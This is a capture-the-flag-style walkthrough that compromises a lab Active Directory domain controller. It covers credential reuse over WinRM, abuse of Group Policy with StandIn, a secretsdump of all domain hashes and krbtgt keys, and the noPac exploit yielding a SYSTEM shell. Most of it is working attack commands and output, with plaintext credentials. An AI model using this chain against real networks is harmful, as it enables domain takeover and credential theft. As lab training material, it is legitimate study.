NMAP

Nmap scan report for 192.168.250.97

Host is up (0.075s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-13 19:28:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: secura.yzx, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: SECURA)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: secura.yzx, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Great! This is the last machine we have. We found some credentials, but most of them don't work. One user’s 'charlotte' credentials work, and they have the
'Remote Management User' permission

netexec smb 192.168.250.97 -u charlotte -p 'Game2On4.!'

SMB 192.168.250.97 445 DC01 [*] Windows Server 2016 Standard 14393 x64 (name:DC01) (domain:secura.yzx)
(signing:True) (SMBv1:True)
SMB 192.168.250.97 445 DC01 [+] secura.yzx\charlotte:Game2On4.!
┌─[r00tv@parrot]─[~/Offsec/Secura/bh]
└──╼ $netexec winrm 192.168.250.97 -u charlotte -p 'Game2On4.!'
WINRM 192.168.250.97 5985 DC01 [*] Windows 10 / Server 2016 Build 14393 (name:DC01) (domain:secura.yzx)
WINRM 192.168.250.97 5985 DC01 [+] secura.yzx\charlotte:Game2On4.! (Pwn3d!)

Enumeration with Bloodhound

└──╼ $bloodhound-python -u charlotte -p 'Game2On4.!' -d secura.yzx -dc dc01.secura.yzx -ns 192.168.250.97 -c all
INFO: Found AD domain: secura.yzx
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.secura.yzx:88)] [Errno
-2] Name or service not known
INFO: Connecting to LDAP server: dc01.secura.yzx
 INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: dc01.secura.yzx
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: era.secura.yzx
INFO: Querying computer: secure.secura.yzx
INFO: Querying computer: dc01.secura.yzx
INFO: Done in 00M 16S

we Can abuse GPO with Dacl upload in DC01 Tool StandIn_v13_Net45.exe and let's Gooo
*Evil-WinRM* PS C:\Users\TEMP\Documents> .\StandIn_v13_Net45.exe --gpo --filter 'Default Domain Policy' --acl

[?] Using DC : dc01.secura.yzx

[+] GPO result count : 1
|_ Result limit : 50
|_ Applying search filter

[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}

Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=secura,DC=yzx
GPCFilesysPath : \\secura.yzx\sysvol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
Path : OK

[+] Account : CREATOR OWNER

Type : Allow
Rights : FullControl
 Inherited ACE : False
Propagation : InheritOnly

[+] Account : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS

Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None

[+] Account : NT AUTHORITY\Authenticated Users

Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None

[+] Account : NT AUTHORITY\SYSTEM

Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : SECURA\Domain Admins

Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly

[+] Account : SECURA\Domain Admins

Type : Allow
Rights : Write, ReadAndExecute, ChangePermissions, TakeOwnership, Synchronize
Inherited ACE : False
Propagation : None

[+] Account : SECURA\Enterprise Admins

Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly

[+] Account : SECURA\Enterprise Admins

Type : Allow
Rights : Write, ReadAndExecute, ChangePermissions, TakeOwnership, Synchronize
Inherited ACE : False
 Propagation : None

[+] Account : SECURA\charlotte

Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

[+] Account : SECURA\charlotte

Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None

exploit
*Evil-WinRM* PS C:\Users\TEMP\Documents> .\StandIn_v13_Net45.exe --gpo --filter 'Default Domain Policy' --localadmin charlotte

[?] Using DC : dc01.secura.yzx

[+] GPO Object Found

Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=secura,DC=yzx
GP Path : \\secura.yzx\sysvol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}

[+] User Object Found

Object : CN=charlotte
Path : LDAP://CN=charlotte,CN=Users,DC=secura,DC=yzx
SID : S-1-5-21-3453094141-4163309614-2941200192-1104
 [?] GPO Version
User : 3
Computer : 70

[+] Writing GPO changes

|_ Updating existing GptTmpl.inf
|_ Adding group membership
|_ Updating revision
|_ Updating gpt.inf
|_ Updating AD object
|_ Incrementing version number
|_ Updating gPCMachineExtensionNames
*Evil-WinRM* PS C:\Users\TEMP\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

Now we need logout and login again

evil-winrm -i 192.168.250.97 -u charlotte -p 'Game2On4.!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this
machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\TEMP\Documents> whoami /all

USER INFORMATION
----------------

User Name SID

================ ==============================================
secura\charlotte S-1-5-21-3453094141-4163309614-2941200192-1104

GROUP INFORMATION
-----------------

Group Name Type SID Attributes

========================================== ================ ============
===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group
owner
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State

========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
 SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

USER CLAIMS INFORMATION

-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\users> type Administrator.DC01\desktop\proof.txt

ad12392e3bad2e3218419201b1f8df2b
*Evil-WinRM* PS C:\users> type charlotte\desktop\local.txt
ed3fd833328d51a4e776e24c9b0a18a8
*Evil-WinRM* PS C:\users>

dump all hashes securedump

secretsdump.py secura.yzx/charlotte:'Game2On4.!'@192.168.250.97
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x939b8d8d02940b871aa06a965864d6d8

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d38e7c66048f80fd9566ab85afca76b1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SECURA\DC01$:aes256-cts-hmac-sha1-96:1b5aa9beafeb672f847de583cd7ba2562ec707b1cd9bb4979b7a7a51f8e35e81
SECURA\DC01$:aes128-cts-hmac-sha1-96:9d3c75299391321265106b197b79ab0b
SECURA\DC01$:des-cbc-md5:857916dc805b1976
SECURA\DC01$:plain_password_hex:b53bf8fcfe4f1ef5e7947eee0711851a8a3943d8726b1b73c4b856435410edea108c4df3b19401689d0a0b13b61154e6040419
579013f812bc00a90f427c1200f60994a4fa0ca15cc6c9d3e11a65bbe48fe3a1d3c6088718081ea4a95f38abfd771e005b59696bffb64538a03d99bfd2ae083707624b
6f1ee570efdcfe5cbd0e36d5965e938320cb6918fb2540725663235da21437efae105744a80554f08c867b79fe82623fb891495063cda20646e1eea1ab2a555508f1aa
8b308cdd9a1b5008862fa73b2f47614ece591ecf43dd1559ee7fb7a9f9c63218e02ae34939188d81f9421482e9975dc85f933a38b4480e
SECURA\DC01$:aad3b435b51404eeaad3b435b51404ee:89048395f5616697572869122cfce19a:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd2698be6ec212927c654dce98399ebdb8cbeda16
dpapi_userkey:0x06c53820508a13889bcacdeb31116f8784a24229
[*] NL$KM
0000 C8 9B 85 2A A5 F8 EA 19 DB 8E 0D 05 A2 28 29 A3 ...*.........().
0010 0B 65 B3 7F 1A 19 4E 28 11 EF 10 D0 56 C0 C5 CB .e....N(....V...
0020 C2 0D D5 DD 67 A8 75 99 75 B1 00 95 60 A2 83 DF ....g.u.u...`...
0030 CC 0A 94 C8 D1 4F 9F 97 6D A7 D4 14 32 C0 2D 1E .....O..m...2.-.
NL$KM:c89b852aa5f8ea19db8e0d05a22829a30b65b37f1a194e2811ef10d056c0c5cbc20dd5dd67a8759975b1009560a283dfcc0a94c8d14f9f976da7d41432c02d1e
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d38e7c66048f80fd9566ab85afca76b1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:431f60ffa71152f8445bea272663d7c3:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
secura.yzx\michael:1103:aad3b435b51404eeaad3b435b51404ee:86593b65670ad9905e397ed56e6a86f3:::
secura.yzx\charlotte:1104:aad3b435b51404eeaad3b435b51404ee:dd76c2d1f3dd82f52fd7a233b37ce1c5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:89048395f5616697572869122cfce19a:::
SECURE$:1105:aad3b435b51404eeaad3b435b51404ee:e9387dcf22b9d984bd9c0b93b07ea32a:::
ERA$:1106:aad3b435b51404eeaad3b435b51404ee:b044f8f20a0416e3e906cca04473959a:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:5478fb1981352b3687e06f6c42ea6401118dc8d43d96d8d08933d170902a6891
krbtgt:aes128-cts-hmac-sha1-96:584a0adb74e771c1e5b5c8aee72ea580
krbtgt:des-cbc-md5:736dc8c7d97f1383
secura.yzx\michael:aes256-cts-hmac-sha1-96:9a9cf39d1495f6134b89127fd69c2b448304997943ae5c45766e60465eee002b
secura.yzx\michael:aes128-cts-hmac-sha1-96:5a411f11ea06fb2b67b1d05c4db353f4
secura.yzx\michael:des-cbc-md5:37231ce52f01fb37
secura.yzx\charlotte:aes256-cts-hmac-sha1-96:a3fe802e478b95cf925c2a843dd57df64401764a1acd9536e6d771637f7000cb
secura.yzx\charlotte:aes128-cts-hmac-sha1-96:90baa1de1bdf9eef1785feaa30ea92c7
secura.yzx\charlotte:des-cbc-md5:644fc4b970bac8f1
DC01$:aes256-cts-hmac-sha1-96:1b5aa9beafeb672f847de583cd7ba2562ec707b1cd9bb4979b7a7a51f8e35e81
DC01$:aes128-cts-hmac-sha1-96:9d3c75299391321265106b197b79ab0b
DC01$:des-cbc-md5:1a13d9d64af2e0bf
SECURE$:aes256-cts-hmac-sha1-96:6a961c58c795714320f03652116b82416c0fa0554968e04813c1c3504e195b09
SECURE$:aes128-cts-hmac-sha1-96:cb08edbe812dea723e08e06ccad50762
SECURE$:des-cbc-md5:f1f23d29f4b65edf
ERA$:aes256-cts-hmac-sha1-96:dc6c8cb32d3c465dfaf7e27dfe9ee9da18cce58839e712f06a456cc1d3fd3217
ERA$:aes128-cts-hmac-sha1-96:65ce339bfc2999b564e06237365076e6
 ERA$:des-cbc-md5:6e4a25237597ba38
[*] Cleaning up...

Another Way with exploit noPac

python3 noPac.py secura.yzx/charlotte:'Game2On4.!' -shell -use-ldap -dc-ip 192.168.250.97

███ ██ ██████ ██████ █████ ██████

████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████

[*] Current ms-DS-MachineAccountQuota = 10

[*] Selected Target dc01.secura.yzx
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-HKPUBD1TPLW$"
[*] MachineAccount "WIN-HKPUBD1TPLW$" password = ZE$a^&A9k@WW
[*] Successfully added machine account WIN-HKPUBD1TPLW$ with password ZE$a^&A9k@WW.
[*] WIN-HKPUBD1TPLW$ object = CN=WIN-HKPUBD1TPLW,CN=Computers,DC=secura,DC=yzx
[*] WIN-HKPUBD1TPLW$ sAMAccountName == dc01
[*] Saving a DC's ticket in dc01.ccache
[*] Reseting the machine account to WIN-HKPUBD1TPLW$
[*] Restored WIN-HKPUBD1TPLW$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc01.secura.yzx.ccache
[*] Attempting to del a computer with the name: WIN-HKPUBD1TPLW$
[-] Delete computer WIN-HKPUBD1TPLW$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
dc01
C:\Windows\system32>